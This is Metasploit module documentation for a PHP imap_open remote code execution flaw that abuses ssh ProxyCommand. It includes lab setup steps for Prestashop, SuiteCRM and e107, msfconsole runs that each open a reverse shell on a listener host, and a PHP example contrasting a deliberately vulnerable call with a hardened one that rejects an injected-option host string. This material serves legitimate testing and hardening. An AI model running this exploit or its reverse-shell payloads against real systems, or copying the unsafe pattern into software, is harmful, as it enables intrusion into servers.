metasploit-gs/documentation/modules/exploit/linux/http/php_imap_open_rce.md
2018-11-24 07:26:42 -05:00

Vulnerable Application

The imap_open function in PHP, if called without the /norsh flag in the mailbox string, will attempt to preauthenticate the IMAP session over rsh. On Debian-based systems, including Ubuntu, rsh is mapped to the ssh binary, and ssh's ProxyCommand option can be passed through imap_open to execute arbitrary commands. While many custom applications may use imap_open, the following applications are reported to be vulnerable:

  • instantcms
  • HostCMS
  • e107 v2
  • prestashop
  • SuiteCRM
  • SugarCRM

Prestashop exploitation requires the admin URI and administrator credentials.
SuiteCRM exploitation requires administrator credentials.
e107 v2 exploitation requires administrator credentials.
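The call pattern that exposes the rsh/ssh preauthentication path, beside a hardened wrapper and a small host posture check, as an added PHP example that is not part of the Metasploit module or its documentation. The function names (open_mailbox_unsafe, build_imap_mailbox, rsh_preauth_exposure), the /usr/bin/rsh alternatives path and the sample hosts are assumptions; the imap.enable_insecure_rsh INI setting is the switch later PHP builds added to disable rsh preauthentication.

```php
<?php
// Added example, not part of the module or its documentation.
// Shows why a user-controlled IMAP server string is dangerous when the
// mailbox spec lacks /norsh, and how to build the spec safely.

// VULNERABLE PATTERN: the server string arrives straight from a request
// parameter and the mailbox spec carries no /norsh flag, so c-client may try
// to preauthenticate over rsh (ssh on Debian/Ubuntu) with that string on the
// command line.
function open_mailbox_unsafe(string $server, string $user, string $pass)
{
    $mailbox = '{' . $server . ':143/imap}INBOX';
    return imap_open($mailbox, $user, $pass);
}

// HARDENED: accept only a strict hostname or dotted-quad IPv4 (no spaces,
// slashes, braces or leading dashes) and always add /norsh so c-client never
// shells out to rsh/ssh, whatever the host looks like.
function validate_imap_host(string $host): bool
{
    $label    = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    $hostname = "/^(?:$label\\.)*$label$/";
    $ipv4     = '/^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$/';
    return strlen($host) <= 253
        && (preg_match($hostname, $host) === 1 || preg_match($ipv4, $host) === 1);
}

function build_imap_mailbox(string $host, int $port, bool $tls = true): string
{
    if (!validate_imap_host($host)) {
        throw new InvalidArgumentException('invalid IMAP host');
    }
    if ($port < 1 || $port > 65535) {
        throw new InvalidArgumentException('invalid IMAP port');
    }
    // /norsh is the flag that matters here; /ssl and /validate-cert keep the
    // transport honest as well.
    $flags = '/imap/norsh' . ($tls ? '/ssl/validate-cert' : '');
    return '{' . $host . ':' . $port . $flags . '}INBOX';
}

function open_mailbox_safe(string $host, int $port, string $user, string $pass)
{
    $mailbox = build_imap_mailbox($host, $port);
    $conn = @imap_open($mailbox, $user, $pass, 0, 1);   // flags 0, one retry
    if ($conn === false) {
        throw new RuntimeException('imap_open failed: ' . imap_last_error());
    }
    return $conn;
}

// Host posture check (assumption: Debian-style layout where /usr/bin/rsh is an
// alternatives symlink). Reports whether the imap extension is loaded, whether
// rsh resolves to ssh, and whether PHP still permits rsh preauthentication
// (imap.enable_insecure_rsh is unknown on PHP builds that predate the switch,
// which ini_get() signals by returning false).
function rsh_preauth_exposure(): array
{
    $rsh     = '/usr/bin/rsh';
    $target  = file_exists($rsh) ? realpath($rsh) : false;
    $setting = ini_get('imap.enable_insecure_rsh');
    return [
        'imap_loaded'          => extension_loaded('imap'),
        'rsh_resolves_to_ssh'  => is_string($target) && basename($target) === 'ssh',
        'insecure_rsh_allowed' => $setting === false
                                  || filter_var($setting, FILTER_VALIDATE_BOOLEAN),
    ];
}

// Constructed inputs: a normal host, and one shaped like an injected option.
foreach (['imap.example.com', '192.0.2.10', 'imap.example.com -o option'] as $h) {
    try {
        echo build_imap_mailbox($h, 993), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo "rejected '$h': ", $e->getMessage(), PHP_EOL;
    }
}
print_r(rsh_preauth_exposure());
```

A host that passes validate_imap_host() cannot carry the whitespace an extra ssh option needs, and /norsh removes the rsh path entirely, so the two measures are independent; keep both, since the mailbox string is the only place the application controls what c-client does with the host.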

Prestashop 1.7.2.4 on Ubuntu 16.04

Mostly derived from websiteforstudents.com, with a few tweaks for Ubuntu 16.04 and to install PHP's imap module.

sudo apt install apache2
sudo sed -i "s/Options Indexes FollowSymLinks/Options FollowSymLinks/" /etc/apache2/apache2.conf
sudo systemctl stop apache2.service
sudo systemctl start apache2.service
sudo systemctl enable apache2.service
sudo apt-get install mariadb-server mariadb-client
sudo systemctl stop mysql.service
sudo systemctl start mysql.service
sudo systemctl enable mysql.service
sudo mysql_secure_installation
sudo systemctl restart mysql.service
sudo apt install php libapache2-mod-php php-common php-mbstring php-xmlrpc php-soap php-gd php-xml php-intl php-mysql php-cli php-mcrypt php-ldap php-zip php-curl php-imap
sudo phpenmod imap
sudo mysql -u root -p

Run the following database commands:

CREATE USER 'prestashopuser'@'localhost' IDENTIFIED BY 'new_password_here';
GRANT ALL ON prestashop.* TO 'prestashopuser'@'localhost' IDENTIFIED BY 'new_password_here' WITH GRANT OPTION;
FLUSH PRIVILEGES;
EXIT;
cd /tmp && curl -O https://download.prestashop.com/download/releases/prestashop_1.7.2.4.zip
unzip prestashop_1.7.2.4.zip
sudo mkdir -p /var/www/html/prestashop
sudo unzip prestashop.zip -d /var/www/html/prestashop/
sudo chown -R www-data:www-data /var/www/html/prestashop/
sudo chmod -R 755 /var/www/html/prestashop/
sudo nano /etc/apache2/sites-available/prestashop.conf

Utilize the following configuration:

<VirtualHost *:80>
     ServerAdmin admin@example.com
     DocumentRoot /var/www/html/prestashop/
     ServerName example.com
     ServerAlias www.example.com
     
     <Directory /var/www/html/prestashop/>
        Options +FollowSymlinks
        AllowOverride All
        Require all granted
     </Directory>
     
     ErrorLog ${APACHE_LOG_DIR}/error.log
     CustomLog ${APACHE_LOG_DIR}/access.log combined
     
</VirtualHost>
sudo a2ensite prestashop.conf
sudo a2enmod rewrite
sudo a2dissite 000-default
sudo systemctl restart apache2.service

Browse to the website, and install with default information.

sudo rm -rf /var/www/html/prestashop/install/

Now browse to /admin; the first time, you will be redirected to the admin URI. If not, run sudo ls /var/www/html/prestashop/admin* to find it.

SuiteCRM 7.8.23 on Ubuntu 16.04

Mostly derived from vultr.com, but adding PHP's zip and mbstring packages.

sudo apt-get install apache2 mariadb-server php7.0 php7.0-mysql php7.0-gd php7.0-curl php7.0-imap libapache2-mod-php7.0 php7.0-mcrypt php7.0-xml php7.0-json php7.0-mbstring php7.0-zip -y
sudo systemctl restart apache2
sudo phpenmod imap
sudo mysql_secure_installation
wget https://suitecrm.com/files/156/SuiteCRM-7.8/322/SuiteCRM-7.8.23.zip
unzip SuiteCRM-7.8.23.zip
sudo mv SuiteCRM-7.8.23 /var/www/html/suitecrm
sudo chown -R www-data:www-data /var/www/html/suitecrm
sudo chmod -R 777 /var/www/html/suitecrm
sudo nano /etc/apache2/sites-available/suitecrm.conf

Utilize the following configuration:

<VirtualHost *:80>
 ServerAdmin admin@yourdomain.com
 DocumentRoot /var/www/html/suitecrm/
 ServerName yourdomain.com
 ServerAlias www.yourdomain.com
<Directory /var/www/html/suitecrm/>
 Options FollowSymLinks
 AllowOverride All
</Directory>
 ErrorLog /var/log/apache2/suitecrm-error_log
 CustomLog /var/log/apache2/suitecrm-access_log common
</VirtualHost>
sudo a2ensite suitecrm
sudo a2dissite 000-default.conf
sudo systemctl restart apache2
sudo systemctl restart mysql

e107 2.1.9 on Ubuntu 16.04

Mostly derived from websiteforstudents.com, but with PHP 7.0 instead of 7.2.

sudo apt install apache2 mariadb-server mariadb-client php7.0 libapache2-mod-php7.0 php7.0-common php7.0-mysql php7.0-gmp php7.0-curl php7.0-intl php7.0-mbstring php7.0-xmlrpc php7.0-gd php7.0-bcmath php7.0-xml php7.0-cli php7.0-zip php7.0-imap -y
sudo systemctl restart apache2.service
sudo systemctl stop mysql.service
sudo systemctl start mysql.service
sudo systemctl enable mysql.service
sudo mysql_secure_installation
sudo mysql -u root -p

Run the following database commands:

CREATE DATABASE e107;
CREATE USER 'e107user'@'localhost' IDENTIFIED BY 'new_password_here';
GRANT ALL ON e107.* TO 'e107user'@'localhost' IDENTIFIED BY 'new_password_here' WITH GRANT OPTION;
FLUSH PRIVILEGES;
EXIT;
cd /tmp
wget http://sourceforge.net/projects/e107/files/e107/e107%20v2.1.9/e107_2.1.9_full.zip
sudo unzip -d /var/www/html/e107 /tmp/e107_2.1.9_full.zip
sudo chown -R www-data:www-data /var/www/html/e107/
sudo chmod -R 755 /var/www/html/e107/
sudo nano /etc/apache2/sites-available/e107.conf

Utilize the following configuration:

<VirtualHost *:80>
     ServerAdmin admin@example.com
     DocumentRoot /var/www/html/e107
     ServerName example.com
     ServerAlias www.example.com

     <Directory /var/www/html/e107/>
          Options FollowSymlinks
          AllowOverride All
          Require all granted
     </Directory>

     ErrorLog ${APACHE_LOG_DIR}/error.log
     CustomLog ${APACHE_LOG_DIR}/access.log combined
    
     <Directory /var/www/html/e107/>
            RewriteEngine on
            RewriteBase /
            RewriteCond %{REQUEST_FILENAME} !-f
            RewriteRule ^(.*) index.php [PT,L]
    </Directory>
</VirtualHost>
sudo a2ensite e107.conf
sudo a2enmod rewrite
sudo a2dissite 000-default
sudo systemctl restart apache2.service
sudo systemctl restart mysql.service

Verification Steps

  1. Install a vulnerable application
  2. Start msfconsole
  3. Do: use exploit/linux/http/php_imap_open_rce
  4. Do: set TARGETURI [URI]
  5. Do: set USERNAME [username]
  6. Do: set PASSWORD [password]
  7. Do: set target [target]
  8. Do: run
  9. You should get a shell.

Options

TARGETURI

The URI for the target. This varies by target. Default is . For Prestashop it should be the admin URI, similar to /admin2769gx8k3.

Scenarios

PrestaShop 1.7.2.4 on Ubuntu 16.04.4 with PHP 7.0

resource (presta.rb)> use exploit/linux/http/php_imap_open_rce
resource (presta.rb)> set TARGETURI /admin2769gx8k3
TARGETURI => /admin2769gx8k3
resource (presta.rb)> set USERNAME ubuntu@none.com
USERNAME => ubuntu@none.com
resource (presta.rb)> set PASSWORD ubuntuubuntu
PASSWORD => ubuntuubuntu
resource (presta.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (presta.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (presta.rb)> set target 0
target => 0
resource (presta.rb)> set verbose true
verbose => true
resource (presta.rb)> exploit
[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Redirected to http://1.1.1.1/admin2769gx8k3/
[*] Redirected to http://1.1.1.1/admin2769gx8k3/index.php?controller=AdminLogin&token=6dab1f7b4eea17d2b44a8929ead9df68
[*] Token: 6dab1f7b4eea17d2b44a8929ead9df68 and Login Redirect: http://1.1.1.1/admin2769gx8k3/&token=09283f9efc45fc75eca3b8d5f1b1f92f
[*] Logging in with ubuntu@none.com:ubuntuubuntu
[*] Login JSON Response: {"hasErrors":false,"redirect":"http:\/\/1.1.1.1\/admin2769gx8k3\/index.php?controller=AdminDashboard&token=e324e8b387afb1874947db9b1ba411c8"}
[+] Login Success, loading admin dashboard to pull tokens
[*] Customer Threads Token: ec653c8bfc09754fc63aaa94101911dc
[+] Sending Payload with Final Token: ec653c8bfc09754fc63aaa94101911dc
[*] IMAP server change left on server, manual revert required.
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:41964) at 2018-11-20 18:29:28 -0500

uname -a
Linux ubuntu1604 4.4.0-138-generic #164-Ubuntu SMP Tue Oct 2 17:16:02 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

SuiteCRM 7.8.23 on Ubuntu 16.04.4 with PHP 7.0

resource (suitecrm.rb)> use exploit/linux/http/php_imap_open_rce
resource (suitecrm.rb)> set target 1
target => 1
resource (suitecrm.rb)> set TARGETURI /
TARGETURI => /
resource (suitecrm.rb)> set USERNAME admin
USERNAME => admin
resource (suitecrm.rb)> set PASSWORD admin
PASSWORD => admin
resource (suitecrm.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (suitecrm.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (suitecrm.rb)> set verbose true
verbose => true
resource (suitecrm.rb)> exploit
[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Loading login page
[*] Logging in as admin:admin
[+] Login Success
[*] Loading InboundEmail page
[+] Sending payload with group_id f047031d-1697-3d0d-bd39-5bf499e5470a
[*] IMAP server config left on server, manual removal required.
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:32806) at 2018-11-20 18:31:40 -0500

uname -a 
Linux ubuntu1604 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

e107 2.1.9 on Ubuntu 16.04.4 with PHP 7.0

resource (e107.rb)> use exploit/linux/http/php_imap_open_rce
resource (e107.rb)> set target 2
target => 2
resource (e107.rb)> set TARGETURI /
TARGETURI => /
resource (e107.rb)> set USERNAME admin
USERNAME => admin
resource (e107.rb)> set PASSWORD admin
PASSWORD => admin
resource (e107.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (e107.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (e107.rb)> set verbose true
verbose => true
resource (e107.rb)> exploit
[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Logging in as admin:admin
[+] Login Success
[*] Checking if Cron is enabled for triggering
[+] Storing payload in mail settings
[*] Loading cron page to execute job manually
[+] Triggering manual run of mail bounce check cron to execute payload with cron id 3 and etoken 3b6aa8ca02dbd2bf8218874606c5e2f1
[*] IMAP server config left on server, manual removal required.
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:50742) at 2018-11-23 20:01:13 -0500

uname -a
Linux ubuntu1604 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)